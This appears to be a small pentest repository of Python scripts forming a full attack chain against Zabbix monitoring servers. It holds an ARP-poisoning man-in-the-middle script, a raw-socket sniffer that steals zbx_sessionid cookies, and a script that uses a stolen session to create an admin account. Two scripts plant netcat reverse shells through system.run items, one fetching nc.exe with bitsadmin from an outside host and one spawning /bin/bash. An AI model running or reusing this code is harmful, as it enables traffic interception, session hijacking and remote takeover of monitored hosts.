├── README.md
├── arp_cache_poison_scapy.py
├── zabbix_bitsadmin_nc_download.py
├── zabbix_host_scan_by_pyzabbix.py
├── zabbix_shell_create_on_Linux.py
├── zabbix_user_create_by_zbxsessionid.py
├── zabbix_version_detect.py
└── zabbix_zbxsessionid_sniffer.py


/README.md:
--------------------------------------------------------------------------------
 1 | # zabbix_test
 2 |  ## this is some scripts for testing zabbix server
 3 | 
 4 | * zabbix_version_detect.py - for detect version of zabbix server
 5 | 
 6 | * zabbix_zbxsessionid_sniffer.py - to catch zbx_sessionid after arp casche poison
 7 | 
 8 | * zabbix_user_create_by_zbxsessionid.py - create user by catched zbx_sessionid
 9 | 
10 | * zabbix_host_scan_by_pyzabbix.py - scan host by created zabbix user
11 | 
12 | * zabbix_shell_create_on_Linux.py - create shell by using system.run and new ser creds
13 | 
14 | * zabbix_bitsadmin_nc_download.py - download nc to winpc (for creating and running tunnel)
15 | 
16 | * arp_cache_poison_scapy.py - some implementation of arp casche poison pentest
17 | 


--------------------------------------------------------------------------------
/arp_cache_poison_scapy.py:
--------------------------------------------------------------------------------
 1 | 
 2 | import argparse
 3 | import os
 4 | import sys
 5 | from scapy.all import *
 6 | 
 7 | interface = raw_input("interface: \n")
 8 | victimIP = raw_input("victim: \n")
 9 | routerIP=raw_input("router: \n")
10 | 
11 | def MACsnag(IP):
12 |     ans, unans = arping(IP)
13 |     for s, r in ans:
14 |         return r[Ether].src
15 | # ip="192.168.56.101"
16 | 
17 | def Spoof(routerIP, victimIP):
18 |     victimMAC = MACsnag(victimIP)
19 |     routerMAC = MACsnag(routerIP)
20 |     send(ARP(op =2, pdst = victimIP, psrc = routerIP, hwdst = victimMAC))
21 |     send(ARP(op = 2, pdst = routerIP, psrc = victimIP, hwdst = routerMAC))
22 | 
23 | def Restore(routerIP, victimIP):
24 |     victimMAC = MACsnag(victimIP)
25 |     routerMAC = MACsnag(routerIP)
26 |     send(ARP(op = 2, pdst = routerIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc= victimMAC), count = 4)
27 |     send(ARP(op = 2, pdst = victimIP, psrc = routerIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = routerMAC), count = 4)
28 | 
29 | def sniffer():
30 |     pkts = sniff(iface = interface, count = 10, prn=lambda x:x.sprintf(" Source: %IP.src% : %Ether.src%, \n %Raw.load% \n\n Reciever: %IP.dst% \n +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+\n"))
31 |     wrpcap("temp.pcap", pkts)
32 | 
33 | def MiddleMan():
34 |     os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
35 |     while 1:
36 |         try:
37 |             Spoof(routerIP, victimIP)
38 |             time.sleep(1)
39 |             sniffer()
40 |         except KeyboardInterrupt:
41 |             Restore(routerIP, victimIP)
42 |             os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
43 |             sys.exit(1)
44 | 
45 | 
46 | if __name__ == "__main__":
47 |     MiddleMan()
48 | 
49 | 
50 | 
51 | 
52 | 


--------------------------------------------------------------------------------
/zabbix_bitsadmin_nc_download.py:
--------------------------------------------------------------------------------
 1 | from pyzabbix import ZabbixAPI, ZabbixAPIException
 2 | import sys
 3 | 
 4 | 
 5 | api_address=raw_input("enter correct URL to api_jsonrpc.php, like http://192.168.56.102/zabbix/api_jsonrpc.php"": \n")
 6 | user= raw_input("enter username: \n")
 7 | password= raw_input("enter password: \n")
 8 | host_name=raw_input("enter hostname: \n")
 9 | # hostid=raw_input("enter hostid: \n")
10 | 
11 | zapi = ZabbixAPI(api_address) # user='Admin', password='zabbix')
12 | 
13 | # Login to the Zabbix API
14 | zapi.login(user, password)
15 | 
16 | # host_name = 'Zabbix_server'
17 | 
18 | # host_name = "windows host"
19 | 
20 | hosts = zapi.host.get(filter={"host": host_name}, selectInterfaces=["interfaceid"])
21 | if hosts:
22 |     host_id = hosts[0]["hostid"]
23 |     print("Found host id {0}".format(host_id))
24 | 
25 |     try:
26 |         item = zapi.item.create(
27 |             hostid=host_id,
28 |             name='netcat_create_reverse_shell',
29 |             key_='system.run["bitsadmin.exe /transfer /download http://192.168.56.100/nc.exe C:\\Users\\Public\\nc.exe && C:\Users\\Public\\nc.exe 192.168.56.100 5555 -e cmd.exe"]',
30 |             type=0,
31 |             value_type=4,
32 |             interfaceid=hosts[0]["interfaces"][0]["interfaceid"],
33 |             delay=30
34 |         )
35 |     except ZabbixAPIException as e:
36 |         print(e)
37 |         sys.exit()
38 |     print("Added item with itemid {0} to host: {1}".format(item["itemids"][0], host_name))
39 | else:
40 |     print("No hosts found")
41 | 


--------------------------------------------------------------------------------
/zabbix_host_scan_by_pyzabbix.py:
--------------------------------------------------------------------------------
 1 | import ast
 2 | from pyzabbix import ZabbixAPI
 3 | 
 4 | api_address=raw_input("enter correct URL to api_jsonrpc.php, like http://192.168.56.102/zabbix/api_jsonrpc.php"": \n")
 5 | #zbx_sessionid= raw_input("enter zbx_sessionid: \n")
 6 | user= raw_input("enter username: \n")
 7 | password= raw_input("enter password: \n")
 8 | 
 9 | zapi = ZabbixAPI(api_address)
10 | zapi.login(user, password)
11 | print("Connected to Zabbix API Version %s" % zapi.api_version())
12 | 
13 | for h in zapi.host.get(output="extend"):
14 |     hostid=h['hostid']
15 |     host=h['host']
16 |     print ("found host: ",host,"hostid: ",hostid)  
17 | 


--------------------------------------------------------------------------------
/zabbix_shell_create_on_Linux.py:
--------------------------------------------------------------------------------
 1 | from pyzabbix import ZabbixAPI, ZabbixAPIException
 2 | import sys
 3 | 
 4 | api_address=raw_input("enter correct URL to api_jsonrpc.php, like http://192.168.56.102/zabbix/api_jsonrpc.php"": \n")
 5 | user= raw_input("enter username: \n")
 6 | password= raw_input("enter password: \n")
 7 | hostname=raw_input("enter hostname: \n")
 8 | # hostid=raw_input("enter hostid: \n")
 9 | 
10 | zapi = ZabbixAPI(api_address)
11 | 
12 | # Login to the Zabbix API
13 | zapi.login(user, password)
14 | 
15 | host_name = hostname
16 | hosts = zapi.host.get(filter={"host": host_name}, selectInterfaces=["interfaceid"])
17 | if hosts:
18 |     host_id = hosts[0]["hostid"]
19 |     print("Found host id {0}".format(host_id))
20 | 
21 |     try:
22 |         item = zapi.item.create(
23 |             hostid=host_id,
24 |             name='netcat_create_reverse_shell',
25 |             key_='system.run["nc 192.168.56.100 4444 -e /bin/bash"]',
26 |             type=0,
27 |             value_type=4,
28 |             interfaceid=hosts[0]["interfaces"][0]["interfaceid"],
29 |             delay=5
30 |         )
31 |     except ZabbixAPIException as e:
32 |         print(e)
33 |         sys.exit()
34 |     print("Added item with itemid {0} to host: {1}".format(item["itemids"][0], host_name))
35 | else:
36 |     print("No hosts found")
37 | 
38 | 


--------------------------------------------------------------------------------
/zabbix_user_create_by_zbxsessionid.py:
--------------------------------------------------------------------------------
 1 | import json
 2 | import requests
 3 | from pyzabbix import ZabbixAPI
 4 | 
 5 | 
 6 | #api_address="http://192.168.56.102/zabbix/api_jsonrpc.php"
 7 | api_address=raw_input("enter correct URL to api_jsonrpc.php, like http://192.168.56.102/zabbix/api_jsonrpc.php"": \n")
 8 | zbx_sessionid= raw_input("enter zbx_sessionid: \n")
 9 | user= raw_input("enter username: \n")
10 | password= raw_input("enter password: \n")
11 | 
12 | url = api_address
13 | headers = {'Content-type': 'application/json'}
14 | data = {"jsonrpc": "2.0", "method": "user.create", "params": {
15 |     "alias": user, "passwd": password, "type": "3", "usrgrps": [
16 |         {"usrgrpid": "7"}], },
17 |         "auth": zbx_sessionid,
18 |         "id": 1
19 |         }
20 | answer = requests.post(url, data=json.dumps(data), headers=headers)
21 | print(answer)
22 | response = answer.json()
23 | print(response)
24 | print ("testing user parameters:")
25 | zapi = ZabbixAPI(api_address)
26 | zapi.login(user, password)
27 | print("Connected to Zabbix API Version %s" % zapi.api_version())
28 | # data = {"jsonrpc": "2.0", "method": "user.login", "params": {
29 | #     "user": user, "passwd": password },
30 | #         "auth": None,
31 | #         "id": 1
32 | #         }
33 | # answer = requests.post(url, data=json.dumps(data), headers=headers)
34 | # print(answer)
35 | # response = answer.json()
36 | # print(response)
37 | 


--------------------------------------------------------------------------------
/zabbix_version_detect.py:
--------------------------------------------------------------------------------
 1 | """
 2 | This script is for testing zabbix version
 3 | by version of the docs on the logon page
 4 | """
 5 | 
 6 | import urllib2  
 7 | import re
 8 | from bs4 import BeautifulSoup  
 9 | 
10 | zab_page='http://192.168.56.102/zabbix/index.php' 
11 | page=urllib2.urlopen(zab_page)
12 | soup = BeautifulSoup(page, 'html.parser')
13 | for link in soup.findAll('a', attrs={'href': re.compile("documentation")}):
14 |     version=link.get('href')
15 | 
16 | parts=re.split('/', version)
17 | 
18 | a=''.join (parts[4:5])
19 | print "zabbix version is",a
20 | 


--------------------------------------------------------------------------------
/zabbix_zbxsessionid_sniffer.py:
--------------------------------------------------------------------------------
 1 | import socket
 2 | import re
 3 | 
 4 | s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800))
 5 | 
 6 | print ("trying to catch zbx_sessionid")
 7 | k = ''
 8 | while True:
 9 |     data = s.recvfrom(65565)
10 |     try:
11 |         # s,m,k=''
12 |         if "HTTP" in data[0][54:]:
13 |             # print "[","="*30,']'
14 |             raw = data[0][54:]
15 |             if "\r\n\r\n" in raw:
16 |                 line = raw.split('\r\n\r\n')[0]
17 |                 print "[*] Header Captured "
18 |                 # print line[line.find('HTTP'):]
19 |                 value = line
20 | 
21 |                 m = re.search("(zbx_sessionid.*)", value)
22 |                 if m:
23 |                         # This is reached.
24 |                         # print("search:", m.group(0))
25 |                     str = m.group(0)
26 |                     k = re.split(r'\W+', str)
27 |                     print ("session_id is :")
28 | 
29 |                     print (k[1])
30 |                     ####Saving founded zbx_sessionid in file
31 |                     # print (date)
32 |                     saved_zbxssids = open('zbx_sessionids.txt','a')
33 |                     saved_zbxssids.write('\n')
34 |                     # date = str(datetime.now())
35 |                     saved_zbxssids.write(k[1]) # or whith date:  saved_zbxssids.write(k[1]+ '   ' + date)
36 |                     saved_zbxssids.write('\n')
37 |                     # saved_zbxssids.write(date)
38 |                     saved_zbxssids.close()
39 |                     print ("zabbix session id saved in file zbx_sessionids.txt")
40 | 
41 |                     # m = ''
42 |                 else:
43 |                     pass
44 |             # print raw
45 |             else:
46 |                 # print '[{}]'.format(data)
47 |                 pass
48 |     except KeyboardInterrupt:
49 |         s.close()
50 | 
51 | 


--------------------------------------------------------------------------------